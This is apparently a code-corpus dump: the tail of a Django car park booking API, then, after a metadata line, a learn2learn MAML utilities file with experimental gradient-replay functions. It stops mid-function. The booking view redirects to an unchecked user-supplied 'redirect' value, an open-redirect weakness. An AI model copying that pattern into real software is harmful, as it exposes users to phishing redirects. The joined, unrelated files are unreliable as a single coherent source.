                return redirect(f"/admin/carparks/{request.data.get('carpark', '')}/bay/add")
            return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        if 'redirect' in request.data:
            return redirect(request.data['redirect'])
        return JsonResponse(serializer.data, status=status.HTTP_201_CREATED)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'PUT', 'DELETE'])
def carbay_detail(request, pk):
    """Retrieve (GET), update (PUT) or delete (DELETE) a single car bay."""
    try:
        carbay: CarBay = CarBay.objects.get(pk=pk)
    except CarBay.DoesNotExist:
        return HttpResponse(status=status.HTTP_404_NOT_FOUND)

    if request.method == 'GET':
        serializer = CarBaySerializer(carbay)
        return JsonResponse(serializer.data)
    elif request.method == 'PUT':
        # Full-object update: the parsed body replaces the record.
        carbay_data = JSONParser().parse(request)
        serializer = CarBaySerializer(carbay, data=carbay_data)
        if serializer.is_valid():
            serializer.save()
            return JsonResponse(serializer.data)
        return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    elif request.method == 'DELETE':
        carbay.delete()
        return HttpResponse(status=status.HTTP_204_NO_CONTENT)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET'])
def carbays_list(request, pk):
    """List every bay belonging to the car park with primary key `pk`."""
    if request.method == 'GET':
        data = CarBay.objects.all().filter(carpark=pk)
        serializer = CarBaySerializer(data, context={'request': request}, many=True)
        return Response(serializer.data)
@login_required(login_url="/login")
@csrf_protect
@api_view(['POST'])
def bays_booked(request):
    """Return the bays already booked for a given carpark on a given date.

    Expected payload::

        {
            "date": "2000-01-01",
            "carpark": 1
        }

    Booking details are stripped from the response on purpose: only each
    bay and its occupied time window are exposed.
    """
    if request.method == 'POST':
        # Bug fix: BOTH fields are required below, so reject when EITHER is
        # missing.  The original used `and`, which only rejected requests
        # missing both and let partial payloads raise KeyError later.
        if 'date' not in request.data or 'carpark' not in request.data:
            return JsonResponse({
                'error': 'Please supply what carpark and date you want.'
            }, status=status.HTTP_400_BAD_REQUEST)
        bays = BaysBooked.objects.filter(booking__date=request.data['date'], bay__carpark=request.data['carpark'])
        baysBookedSerializer = BaysBookedSerializer(bays, context={'request': request}, many=True)
        # Do not return any information on bookings
        baysCleaned = [{
            'pk': bay['pk'],
            'bay': bay['bay'],
            'start_time': bay['start_time'],
            'end_time': bay['end_time'],
        } for bay in baysBookedSerializer.data]
        return JsonResponse({'success': True, 'bays': baysCleaned}, status=status.HTTP_200_OK)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def bookings(request):
    """GET: list all bookings.  POST: create a booking plus its booked bays,
    then email a confirmation to the supplied address."""
    if request.method == 'GET':
        bookings = Bookings.objects.all()
        bookingsSerializer = BookingsSerializer(bookings, context={'request': request}, many=True)
        return Response(bookingsSerializer.data)
    elif request.method == 'POST':
        """
        {
            "booking": {
                "carpark": 1,
                "date": "2000-01-01", # YYYY-MM-DD
                "name": "uniart",
                "email": "<EMAIL>",
                "rego": "1234",
                "company": "uni",
                "phone": 1234,
                "user": 1
            },
            "bays": [
                {
                    "bay": 1,
                    "start_time": "00:00",
                    "end_time": "12:00"
                },
                {
                    "bay": 2,
                    "start_time": "00:00",
                    "end_time": "12:00"
                }
            ]
        }
        """
        if 'booking' not in request.data:
            return JsonResponse({
                'error': 'Please supply booking details.'
            }, status=status.HTTP_400_BAD_REQUEST)
        if 'bays' not in request.data:
            return JsonResponse({
                'error': 'Please supply bays to be booked.'
            }, status=status.HTTP_400_BAD_REQUEST)

        booking = request.data['booking']

        # Find carpark for booking
        try:
            carpark = CarPark.objects.get(pk=booking['carpark'])
        except CarPark.DoesNotExist:
            return JsonResponse({
                'error': 'No carpark could be found given the id.'
            }, status=status.HTTP_400_BAD_REQUEST)
        booking['carpark_id'] = carpark.pk

        # Find user for booking
        try:
            user = User.objects.get(pk=booking['user'])
        except User.DoesNotExist:
            return JsonResponse({
                'error': 'No user could be found given the id.'
            }, status=status.HTTP_400_BAD_REQUEST)
        booking['user_id'] = user.pk

        bookingsSerializer = BookingsSerializer(data=request.data['booking'])
        if not bookingsSerializer.is_valid():
            return JsonResponse({
                'errors': bookingsSerializer.errors
            }, status=status.HTTP_400_BAD_REQUEST)
        bookingsSerializer.save()

        # Save Bays
        # NOTE(review): if a bay fails validation below, the booking saved
        # above is NOT rolled back; consider wrapping in transaction.atomic().
        for bay in request.data['bays']:
            try:
                CarBay.objects.get(pk=bay['bay'])
            except CarBay.DoesNotExist:
                return JsonResponse({
                    'error': 'No Carpark bay could be found given the id.'
                }, status=status.HTTP_400_BAD_REQUEST)

            bayBooked = bay
            bayBooked['booking_id'] = bookingsSerializer.data['pk']
            bayBooked['bay_id'] = bay['bay']

            baysBookedSerializer = BaysBookedSerializer(data=bayBooked)
            if not baysBookedSerializer.is_valid():
                return JsonResponse({
                    'errors': baysBookedSerializer.errors
                }, status=status.HTTP_400_BAD_REQUEST)
            baysBookedSerializer.save()

        # Send email
        booking = bookingsSerializer.data
        if log_and_send_mail(
            subject="Your UniPark Booking",
            to_email=[request.data['booking']['email']],
            category="EmailBooking",
            template="emails/booking.html",
            data={
                "booking": booking,
                "carpark": booking['carpark'],
                "bays": BaysBooked.objects.filter(booking__id=booking['pk']),
                "user": booking['user'],
            },
        ):
            return JsonResponse({'success': True, 'booking_id': bookingsSerializer.data['pk']},
                                status=status.HTTP_201_CREATED)
        else:
            return JsonResponse({
                'error': 'Something went wrong when sending email.'
            }, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'DELETE'])
def booking(request, pk):
    """GET: a booking plus its (sanitised) bays.  DELETE: remove the booking
    and every bay reservation attached to it."""
    if request.method == 'GET':
        try:
            booking = Bookings.objects.get(pk=pk)
        except Bookings.DoesNotExist:
            return JsonResponse({'error': 'Booking cannot be found.'}, status=status.HTTP_400_BAD_REQUEST)
        bookingsSerializer = BookingsSerializer(booking, context={'request': request})

        # NOTE(review): .filter() never raises DoesNotExist (it returns an
        # empty queryset), so this except branch is effectively dead code.
        try:
            bays = BaysBooked.objects.filter(booking__id=pk)
        except Bookings.DoesNotExist:
            return JsonResponse({'error': 'No bays can be found for this booking.'}, status=status.HTTP_400_BAD_REQUEST)
        baysBookedSerializer = BaysBookedSerializer(bays, context={'request': request}, many=True)

        # Strip booking internals; expose only each bay and its time window.
        baysCleaned = []
        for bay in baysBookedSerializer.data:
            baysCleaned.append({
                'pk': bay['pk'],
                'bay': bay['bay'],
                'start_time': bay['start_time'],
                'end_time': bay['end_time'],
            })
        return JsonResponse({'booking': bookingsSerializer.data, 'bays': baysCleaned}, status=status.HTTP_200_OK)

    if request.method == 'DELETE':
        # NOTE(review): unlike the GET branch, a missing pk here raises
        # Bookings.DoesNotExist (HTTP 500) instead of returning 400.
        booking = Bookings.objects.get(pk=pk)
        booking.delete()
        bays = BaysBooked.objects.filter(booking__id=pk)
        for bay in bays:
            bay.delete()
        return HttpResponse(status=status.HTTP_204_NO_CONTENT)
| 2.09375 | 2 |
utils.py | eepLearning/learn2learn | 0 | 17698 | <filename>utils.py
import numpy as np
import torch
from torch.autograd import grad
from learn2learn.utils import clone_module, update_module
from torch import nn, optim
def maml_update(model, lr, grads=None):
    """
    [[Source]](https://github.com/learnables/learn2learn/blob/master/learn2learn/algorithms/maml.py)

    **Description**

    Performs a MAML update on model using grads and lr.
    The function re-routes the Python object, thus avoiding in-place
    operations.

    NOTE: The model itself is updated in-place (no deepcopy), but the
    parameters' tensors are not.

    **Arguments**

    * **model** (Module) - The model to update.
    * **lr** (float) - The learning rate used to update the model.
    * **grads** (list, *optional*, default=None) - A list of gradients for each parameter
        of the model. If None, will use the gradients in .grad attributes.

    **Example**
    ~~~python
    maml = l2l.algorithms.MAML(Model(), lr=0.1)
    model = maml.clone() # The next two lines essentially implement model.adapt(loss)
    grads = autograd.grad(loss, model.parameters(), create_graph=True)
    maml_update(model, lr=0.1, grads)
    ~~~
    """
    if grads is not None:
        params = list(model.parameters())
        # Idiom fix: `params` is already a list (no second list() needed) and
        # `!=` reads better than `not ... ==`.
        if len(grads) != len(params):
            msg = 'WARNING:maml_update(): Parameters and gradients have different length. ('
            msg += str(len(params)) + ' vs ' + str(len(grads)) + ')'
            print(msg)
        for p, g in zip(params, grads):
            if g is not None:
                # Stash the proposed delta; update_module applies it
                # functionally rather than mutating tensors in place.
                p.update = - lr * g
    return update_module(model)
def accuracy(predictions, targets):
    """Return the fraction of rows in `predictions` whose argmax equals the target label."""
    predicted_labels = predictions.argmax(dim=1).view(targets.shape)
    num_correct = (predicted_labels == targets).sum().float()
    return num_correct / targets.size(0)
def fast_adapt(batch, learner, loss, adaptation_steps, shots, ways, device):
    """Adapt `learner` on the support half of `batch`, then evaluate on the query half.

    The even positions of the task batch form the support (adaptation) set;
    the remaining samples form the query (evaluation) set.

    Returns (query_loss, query_accuracy).
    """
    inputs, targets = batch
    inputs, targets = inputs.to(device), targets.to(device)

    # Build boolean masks: even positions -> support, the rest -> query.
    support_mask = np.zeros(inputs.size(0), dtype=bool)
    support_mask[np.arange(shots * ways) * 2] = True
    query_mask = torch.from_numpy(~support_mask)
    support_mask = torch.from_numpy(support_mask)

    support_x, support_y = inputs[support_mask], targets[support_mask]
    query_x, query_y = inputs[query_mask], targets[query_mask]

    # Inner-loop adaptation on the support loss.
    for _ in range(adaptation_steps):
        learner.adapt(loss(learner(support_x), support_y))

    # Outer-loop evaluation on the query set.
    query_logits = learner(query_x)
    return loss(query_logits, query_y), accuracy(query_logits, query_y)
# Adapt the model #support loss
def fake_adopt_debug2(batch,
                      learner,
                      loss,
                      adaptation_steps,
                      shots,
                      ways,
                      device,
                      error_dict,
                      error_data,
                      task):
    """Debug variant of fast_adapt that performs the inner loop manually.

    Instead of learner.adapt(...), per-sample losses are computed, averaged,
    differentiated with create_graph=True, and applied via update_module.
    `error_dict` and `error_data` are accepted only for signature
    compatibility; dummy dicts are returned in their place.

    Returns (query_loss, query_accuracy, {"2": [3]}, {"2": [3]}).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    # print("evaluation_indices",evaluation_indices)
    # print("adaptation_indices", adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Per-sample losses (no reduction) so the mean can be rebuilt explicitly.
    loss2 = nn.CrossEntropyLoss(reduction='none')
    # Adapt the model on the support loss (manual equivalent of learner.adapt).
    for step in range(adaptation_steps):
        train_error = loss2(learner(adaptation_data), adaptation_labels)
        # learner.adapt(train_error) #update
        mean_seperate_error = torch.mean(train_error)
        # create_graph=True keeps the derivative graph for second-order MAML.
        grads = grad(mean_seperate_error, learner.parameters(), create_graph=True)
        updates = [-learner.lr * g for g in grads]
        update_module(learner, updates=updates)
    # Evaluate the adapted model on the query split.
    predictions = learner(evaluation_data)
    # query loss
    valid_error = loss(predictions, evaluation_labels)
    valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy,{"2":[3]},{"2":[3]}
def fake_adopt_before(batch, learner, loss, adaptation_steps, shots, ways, device, error_dict, error_data, task):
    """Verbose debug variant: record per-sample support gradients, then adapt.

    Each support sample's loss (scaled by 1/5) is differentiated and the raw
    gradient tuples are appended to error_dict[task]; all stored gradients
    are then replayed through maml_update. The query split is stashed in
    error_data[task] for fake_adopt_now. Debug print statements are left in.

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    datas, labels = batch
    datas, labels = datas.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(datas.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    # print("evaluation_indices",evaluation_indices)
    # print("adaptation_indices", adaptation_indices)
    adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
    # Adapt the model sample-by-sample.
    train_error = 0
    print("adaptation_labels)", adaptation_labels)
    for step in range(adaptation_steps):
        for (one_class_data, one_class_label) in zip(adaptation_data, adaptation_labels):
            print("one_class_label: ", one_class_label)
            # Restore the batch dimension lost by iterating sample-by-sample.
            one_class_data = one_class_data.unsqueeze(0)
            one_class_label = one_class_label.unsqueeze(0)
            print("one_class_label:(unsquzee) ", one_class_label)
            one_class_loss = loss(learner(one_class_data), one_class_label)
            # 1/5 scaling: presumably averages over 5 support samples -- TODO confirm vs shots*ways.
            grads = grad(one_class_loss / 5, learner.parameters(), allow_unused=False)
            error_dict[task].append(grads)
            train_error += one_class_loss
            # print("one class label loss :",one_class_loss)
    # print("mean train error :",train_error/5)
    # NOTE: original_error is computed but never used below (debug leftover).
    original_error = loss(learner(adaptation_data), adaptation_labels)
    # print("original train error : ",original_error)
    # print("@@@@@@@@@@@@@@@@@@@debug loss")
    # fine-tune
    # learner.adapt(train_error)
    # Replay every stored per-sample gradient as a MAML step.
    for g in error_dict[task]:
        learner = maml_update(learner, learner.lr, g)
    # Evaluate the adapted model on the query split.
    error_data[task] = evaluation_data, evaluation_labels
    predictions = learner(evaluation_data)
    # query loss
    evaluation_error = loss(predictions, evaluation_labels)
    evaluation_accuracy = accuracy(predictions, evaluation_labels)
    return evaluation_error, evaluation_accuracy, error_dict, error_data
def fake_adopt_now(learner, fake_grads, loss, error_data, task):
    """Replay the gradient lists recorded for `task` via maml_update, then
    return the loss on the stored query split."""
    for recorded_grads in fake_grads:
        learner = maml_update(learner, learner.lr, recorded_grads)
    query_inputs, query_targets = error_data[task]
    return loss(learner(query_inputs), query_targets)
def fake_adopt_debug(batch, learner, loss, adaptation_steps, shots, ways, device, error_dict, error_data, task):
    """Debug variant: records per-sample fake updates but performs NO adaptation.

    Every attempt at applying the recorded updates is commented out below, so
    the learner is evaluated on the query split in its unadapted state. Each
    support sample's loss (scaled by 1/5) is differentiated with
    create_graph=True and stored as an update list in error_dict[task];
    the query split is stored in error_data[task].

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    datas, labels = batch
    datas, labels = datas.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(datas.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    # print("evaluation_indices",evaluation_indices)
    # print("adaptation_indices", adaptation_indices)
    adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
    # Collect per-sample support losses.
    train_error = []
    # print("adaptation_labels)", adaptation_labels)
    for step in range(adaptation_steps):
        for (one_class_data, one_class_label) in zip(adaptation_data, adaptation_labels):
            # print("one_class_label: ", one_class_label)
            # print("one_class_label:(unsquzee) ", one_class_label)
            # note: the two unsqueeze lines below were once commented out
            one_class_data = one_class_data.unsqueeze(0)
            one_class_label = one_class_label.unsqueeze(0)
            one_class_loss = loss(learner(one_class_data), one_class_label)
            # 1/5 scaling: presumably averages over 5 support samples -- TODO confirm vs shots*ways.
            grads = grad(one_class_loss / 5, learner.parameters(), create_graph=True)
            updates = [-learner.lr * g for g in grads]
            error_dict[task].append(updates)
            train_error.append(one_class_loss)
            # print("one class label loss :",one_class_loss)
    # print("mean train error :",train_error/5)
    # original_error = loss(learner(adaptation_data), adaptation_labels)
    # print("original train error : ",original_error)
    # print("@@@@@@@@@@@@@@@@@@@debug loss")
    # fine-tune
    # learner.adapt(train_error)
    # attempt 1
    # for g in error_dict[task]:
    #     learner = maml_update(learner, learner.lr, g)
    # attempt 2
    # for u in error_dict[task]:
    #     update_module(learner,updates = u)
    # attempt 3
    # grads = grad(train_error, learner.parameters(), create_graph=True)
    # updates = [-learner.lr * g for g in grads]
    # update_module(learner, updates=updates)
    # attempt 4
    # grads = grad(original_error, learner.parameters(), create_graph=True)
    # updates = [-learner.lr * g for g in grads]
    # update_module(learner, updates=updates)
    # attempt 5
    # mean_error = torch.mean(torch.stack(train_error))
    # grads = grad(mean_error, learner.parameters(), create_graph=True)
    # updates = [-learner.lr * g for g in grads]
    # update_module(learner, updates=updates)
    # attempt 6
    # mean_error = torch.mean(torch.stack(train_error))
    # grads = grad(mean_error, learner.parameters(), create_graph=True)
    # updates = [-learner.lr * g for g in grads]
    # update_module(learner, updates=updates)
    # Evaluate the (unadapted) model on the query split.
    error_data[task] = evaluation_data, evaluation_labels
    predictions = learner(evaluation_data)
    # query loss
    evaluation_error = loss(predictions, evaluation_labels)
    evaluation_accuracy = accuracy(predictions, evaluation_labels)
    return evaluation_error, evaluation_accuracy, error_dict, error_data
def evaluate(test_iteration, maml, task_information):
    """Run `test_iteration` meta-test episodes and report mean/std of loss and accuracy.

    Each episode clones the meta-learner, samples one test task, adapts with
    fast_adapt, and records the resulting query loss/accuracy.

    Returns (error_mean, error_std, accuracy_mean, accuracy_std).
    """
    tasksets, meta_batch_size, loss, adaptation_steps, shots, ways, device = task_information
    episode_errors = []
    episode_accuracies = []
    for _ in range(test_iteration):
        learner = maml.clone()
        batch = tasksets.test.sample()
        episode_error, episode_accuracy = fast_adapt(
            batch, learner, loss, adaptation_steps, shots, ways, device)
        episode_errors.append(episode_error.item())
        episode_accuracies.append(episode_accuracy.item())
    error_mean, error_std = np.mean(episode_errors), np.std(episode_errors)
    accuracy_mean, accuracy_std = np.mean(episode_accuracies), np.std(episode_accuracies)
    print('Meta Test Error(Iteration Record)', error_mean)
    print('Meta Test Accuracy(Iteration Record)', accuracy_mean)
    return error_mean, error_std, accuracy_mean, accuracy_std
####new fake adopt 1
def fake_adopt_1_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots, ways, device,
                        error_dict, error_data,
                        task):
    """Normal MAML inner loop that ALSO records per-sample support updates.

    Every support sample's cross-entropy loss is differentiated, scaled by
    -learner.lr and appended to error_dict[task]; the query split is stashed
    in error_data[task] so fake_adopt_1_now can later replay the updates.

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    datas, labels = batch
    datas, labels = datas.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(datas.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    # print("evaluation_indices",evaluation_indices)
    # print("adaptation_indices", adaptation_indices)
    adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
    # Per-sample losses (no reduction) so each sample gets its own gradient.
    loss2 = nn.CrossEntropyLoss(reduction='none')
    for step in range(adaptation_steps):
        individual_loss = loss2(learner(adaptation_data), adaptation_labels)
        for il in individual_loss:
            grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed after the first call and later grad() calls fail
            updates = [-learner.lr * g for g in grads]
            error_dict[task].append(updates)
        train_error = loss(learner(adaptation_data), adaptation_labels)
        learner.adapt(train_error)
    error_data[task] = evaluation_data, evaluation_labels
    # Evaluate the adapted model on the query split.
    predictions = learner(evaluation_data)
    # query loss
    evaluation_error = loss(predictions, evaluation_labels)
    evaluation_accuracy = accuracy(predictions, evaluation_labels)
    return evaluation_error, evaluation_accuracy, error_dict, error_data
def fake_adopt_1_now(learner, fake_grads, loss, error_data, task):
    """Replay the stored per-sample updates on `learner`, then return the
    loss on the query split recorded for `task`."""
    for stored_updates in fake_grads:
        update_module(learner, updates=stored_updates)
    query_inputs, query_targets = error_data[task]
    return loss(learner(query_inputs), query_targets)
#####fake_adopt 3
def fake_adopt_3_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots,
                        ways,
                        device,
                        error_dict,
                        error_data,
                        task, iteration):
    """On iterations divisible by 49, record per-sample fake updates instead
    of training; otherwise run the normal MAML inner loop.

    Fake path: each support sample's loss is differentiated and stored as an
    update list in error_dict[task]; the query split goes into
    error_data[task] for fake_adopt_3_now, and placeholder zero tensors are
    returned for loss/accuracy.

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Adapt the model on the support loss.
    if iteration % 49 == 0:
        # Per-sample losses (no reduction) so each sample gets its own gradient.
        loss2 = nn.CrossEntropyLoss(reduction='none')
        for step in range(adaptation_steps):
            individual_loss = loss2(learner(adaptation_data), adaptation_labels)
            for il in individual_loss:
                grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed and later grad() calls fail
                updates = [-learner.lr * g for g in grads]
                error_dict[task].append(updates)
            error_data[task] = evaluation_data, evaluation_labels
        # train_error = torch.mean(individual_loss)
        # learner.adapt(train_error)
        # Placeholders: no adaptation/evaluation happens on the fake path.
        valid_error = torch.tensor([0])
        valid_accuracy = torch.tensor([0])
    else:
        for step in range(adaptation_steps):
            train_error = loss(learner(adaptation_data), adaptation_labels)
            learner.adapt(train_error)
        predictions = learner(evaluation_data)
        valid_error = loss(predictions, evaluation_labels)
        valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_3_now(learner, fake_grads, loss, error_data, task):
    """Replay recorded fake updates on `learner` and compute its loss on the
    stored query split for `task`."""
    for recorded_updates in fake_grads:
        update_module(learner, updates=recorded_updates)
    inputs, targets = error_data[task]
    return loss(learner(inputs), targets)
#############fake adopt 4
def fake_adopt_4_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots,
                        ways,
                        device,
                        error_dict,
                        error_data,
                        task, iteration):
    """On iterations divisible by 9, record raw per-sample support LOSSES
    (not gradients) instead of training; otherwise run the normal inner loop.

    Fake path: each un-reduced cross-entropy loss tensor is appended to
    error_dict[task] -- the gradient computation is intentionally deferred
    (see the commented lines); the query split goes into error_data[task]
    and placeholder zero tensors are returned.

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Adapt the model on the support loss.
    if iteration % 9 == 0:
        loss2 = nn.CrossEntropyLoss(reduction='none')
        for step in range(adaptation_steps):
            individual_loss = loss2(learner(adaptation_data), adaptation_labels)
            for il in individual_loss:
                #grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed and later grad() calls fail
                #updates = [-learner.lr * g for g in grads]
                error_dict[task].append(il)
            error_data[task] = evaluation_data, evaluation_labels
        # train_error = torch.mean(individual_loss)
        # learner.adapt(train_error)
        # Placeholders: no adaptation/evaluation happens on the fake path.
        valid_error = torch.tensor([0])
        valid_accuracy = torch.tensor([0])
    else:
        for step in range(adaptation_steps):
            train_error = loss(learner(adaptation_data), adaptation_labels)
            learner.adapt(train_error)
        predictions = learner(evaluation_data)
        valid_error = loss(predictions, evaluation_labels)
        valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_4_now(learner, fake_grads, loss, error_data, task):
    """Counterpart of fake_adopt_4_before: turn the stored per-sample LOSSES
    into parameter updates, apply them, and return the query loss.

    fake_adopt_4_before stores raw scalar loss tensors in error_dict (the
    gradient step is deferred), so each stored loss is differentiated here
    before being applied with update_module. The original passed the scalar
    loss directly as `updates=`, which update_module cannot consume.
    """
    for stored_loss in fake_grads:
        # retain_graph: the same autograd graph is reused for every stored loss.
        grads = grad(stored_loss, learner.parameters(), retain_graph=True)
        updates = [-learner.lr * g for g in grads]
        update_module(learner, updates=updates)
    query_data, query_label = error_data[task]
    predictions = learner(query_data)
    # Query loss on the evaluation split stored by fake_adopt_4_before.
    evaluation_error = loss(predictions, query_label)
    return evaluation_error
#############fake adopt 5
def fake_adopt_5_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots,
                        ways,
                        device,
                        error_dict,
                        error_data,
                        task, iteration,split_meta_batch_size):
    """Clients with index >= split_meta_batch_size record per-sample fake
    updates instead of training; the rest run the normal MAML inner loop.

    Fake path: each support sample's loss is differentiated and stored as an
    update list in error_dict[task]; the query split goes into
    error_data[task] for fake_adopt_5_now, and placeholder zero tensors are
    returned. `iteration` is unused (kept for signature compatibility).

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Adapt the model on the support loss.
    if task >= split_meta_batch_size:
        loss2 = nn.CrossEntropyLoss(reduction='none')
        for step in range(adaptation_steps):
            individual_loss = loss2(learner(adaptation_data), adaptation_labels)
            for il in individual_loss:
                grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed and later grad() calls fail
                updates = [-learner.lr * g for g in grads]
                error_dict[task].append(updates)
            error_data[task] = evaluation_data, evaluation_labels
        # train_error = torch.mean(individual_loss)
        # learner.adapt(train_error)
        # Placeholders: no adaptation/evaluation happens on the fake path.
        valid_error = torch.tensor([0])
        valid_accuracy = torch.tensor([0])
    else:
        for step in range(adaptation_steps):
            train_error = loss(learner(adaptation_data), adaptation_labels)
            learner.adapt(train_error)
        predictions = learner(evaluation_data)
        valid_error = loss(predictions, evaluation_labels)
        valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_5_now(learner, fake_grads, loss, error_data, task):
    """Apply the update lists recorded for `task`, then return the loss on
    the stored query split."""
    for update_list in fake_grads:
        update_module(learner, updates=update_list)
    eval_inputs, eval_targets = error_data[task]
    return loss(learner(eval_inputs), eval_targets)
#############fake adopt 6
def fake_adopt_6_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots,
                        ways,
                        device,
                        error_dict,
                        error_data,
                        task, iteration,split_meta_batch_size):
    """Experiment variant 6 (code-identical to fake_adopt_5_before).

    Clients with index >= split_meta_batch_size record per-sample fake
    updates in error_dict[task] and stash their query split in
    error_data[task] (placeholder zero tensors are returned); the remaining
    clients run the normal MAML inner loop. `iteration` is unused.

    Returns (query_loss, query_accuracy, error_dict, error_data).
    """
    data, labels = batch
    data, labels = data.to(device), labels.to(device)
    # Even positions of the task batch -> support set, the rest -> query set.
    adaptation_indices = np.zeros(data.size(0), dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    evaluation_indices = torch.from_numpy(~adaptation_indices)
    adaptation_indices = torch.from_numpy(adaptation_indices)
    adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
    evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
    # Adapt the model on the support loss.
    if task >= split_meta_batch_size:
        loss2 = nn.CrossEntropyLoss(reduction='none')
        for step in range(adaptation_steps):
            individual_loss = loss2(learner(adaptation_data), adaptation_labels)
            for il in individual_loss:
                grads = grad(il, learner.parameters(), retain_graph=True)  # without retain_graph the graph is freed and later grad() calls fail
                updates = [-learner.lr * g for g in grads]
                error_dict[task].append(updates)
            error_data[task] = evaluation_data, evaluation_labels
        # train_error = torch.mean(individual_loss)
        # learner.adapt(train_error)
        # Placeholders: no adaptation/evaluation happens on the fake path.
        valid_error = torch.tensor([0])
        valid_accuracy = torch.tensor([0])
    else:
        for step in range(adaptation_steps):
            train_error = loss(learner(adaptation_data), adaptation_labels)
            learner.adapt(train_error)
        predictions = learner(evaluation_data)
        valid_error = loss(predictions, evaluation_labels)
        valid_accuracy = accuracy(predictions, evaluation_labels)
    return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_6_now(learner, fake_grads, loss, error_data, task):
    """Apply every recorded fake update to `learner`, then score it on the
    query split saved for `task`."""
    for pending_updates in fake_grads:
        update_module(learner, updates=pending_updates)
    held_out_inputs, held_out_targets = error_data[task]
    predictions = learner(held_out_inputs)
    return loss(predictions, held_out_targets)
############# fake adopt 7 (lab-meeting feedback)
# 50% normal + 50% fake
# first 50% of the clients: normal training
# last 50% of the clients: fake training
def fake_adopt_7_before(batch,
                        learner,
                        loss,
                        adaptation_steps,
                        shots,
                        ways,
                        device,
                        error_dict,
                        error_data,
                        task, iteration, split_meta_batch_size):
